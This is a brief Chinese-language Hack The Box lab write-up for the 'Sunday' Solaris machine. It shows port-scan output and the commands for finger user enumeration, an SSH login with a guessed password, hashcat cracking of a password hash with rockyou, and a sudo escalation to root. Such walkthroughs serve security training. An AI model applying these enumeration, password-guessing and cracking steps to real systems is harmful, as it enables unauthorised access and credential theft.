HTB 学习笔记
【Hack The Box】linux练习-- Sunday
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
信息收集
79/tcp open finger Sun Solaris fingerd
| finger: Login Name TTY Idle When Where\x0D
| sunny sunny pts/1 Thu 14:52 10.10.14.245 \x0D
| sunny sunny pts/2 4 Thu 13:55 10.10.15.182 \x0D
| sunny sunny pts/4 2 Thu 13:55 10.10.16.94 \x0D
| sunny sunny pts/5 8 Thu 14:52 10.10.15.42 \x0D
| sunny sunny pts/6 21 Thu 14:14 10.10.14.120 \x0D
| sunny sunny pts/7 2 Thu 14:32 10.10.15.138 \x0D
| sunny sunny pts/8 49 Thu 14:20 10.10.15.167 \x0D
| sunny sunny pts/9 9 Thu 14:28 10.10.14.122 \x0D
| sammy sammy pts/10 Thu 15:07 10.10.14.78 \x0D
| sunny sunny pts/11 1 Thu 15:06 10.10.16.73 \x0D
| sammy sammy pts/12 4 Thu 14:44 10.10.15.38 \x0D
| sammy sammy pts/13 Thu 15:10 10.10.15.182 \x0D
|_sammy sammy pts/14 1 Thu 15:06 10.10.15.213 \x0D
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
65258/tcp open smserverd 1 (RPC #100155)
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
65258/tcp open smserverd
22022/tcp open ssh
111的 rpc
79/tcp open finger Sun Solaris fingerd
finger
pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.129.16.126
发现两个用户
sammy
sunny
ssh -p 22022 sunny@10.129.16.126
密码作为:sunday有效
发现,打开查看
然后去hashcat官网查看是什么加密格式,知道是7400
hashcat -m 7400 sunday.hashes /usr/share/wordlists/rockyou.txt --force
得到密码:cooldude!
sudo -l
直接sudo su